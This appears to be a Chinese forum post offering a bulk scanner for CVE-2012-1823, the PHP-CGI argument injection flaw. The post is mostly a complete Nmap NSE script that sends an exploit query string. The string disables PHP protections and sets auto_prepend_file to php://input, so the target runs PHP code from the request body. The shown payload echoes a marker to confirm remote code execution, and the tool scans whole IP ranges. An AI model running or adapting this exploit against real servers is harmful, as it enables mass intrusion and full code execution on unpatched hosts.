CVE-2012-1823批量检测工具.rar

admin

（请不要用于非法，否则后果自负）。

使用多线程，速度还不错。
支持IP格式
单IP： 10.1.1.
IP段：10.1.1.1-255
子网掩码：10.10.1.1/16

如果发现存在漏洞的IP，会在程序当前目录下生成一个report.txt。没有漏洞则不生成文件.

游客，如果您要查看本帖隐藏内容请回复

NSE脚本如下:

1. local http=require "http"
   
2. local shortport = require "shortport"
   
3. local vulns = require "vulns"
   
4. 
   
5. descripton=[[
   
6. PHP CGI Argument Injection Exploit]]
   
7. author="m0zh3"
   
8. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
   
9. categories={"exploit","vuln"}
   
10. 
    
11. -- The Rule Section --
    
12. portrule = shortport.http
    
13. -- The Action Section --
    
14. 
    
15. 
    
16. local path ="/?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n"
    
17. local payload = "<?php echo " .. ""m00zh33"" .. ";die();?>"
    
18. local status
    
19. 
    
20. local function exploit(host, port)
    
21.         local ret = http.post(host,port,path,nil,nil,payload)
    
22.         local body = string.lower(ret.body)
    
23.         for s in string.gmatch(body,"m00zh33") do
    
24.                 status = "yes"
    
25.         end
    
26. end
    
27. 
    
28. action = function(host, port)
    
29.         local vuln_table = {
    
30.                 title = "CVE-2012-1823",
    
31.                 reference = "http://www.exploit-db.com/exploits/18836/"}
    
32.         local report = vulns.Report:new(SCRIPT_NAME, host, port)
    
33.         vuln_table.state = vulns.STATE.NOT_VULN
    
34.         exploit(host,port)
    
35.         stdnse.print_debug(status)
    
36.         if status == "yes" then
    
37.                 vuln_table.state = vulns.STATE.VULN
    
38.         end
    
39.         return report:make_output(vuln_table)
    
40. end

复制代码

我是个凑数的。。。

好好 学习了 确实不错

感谢楼主分享！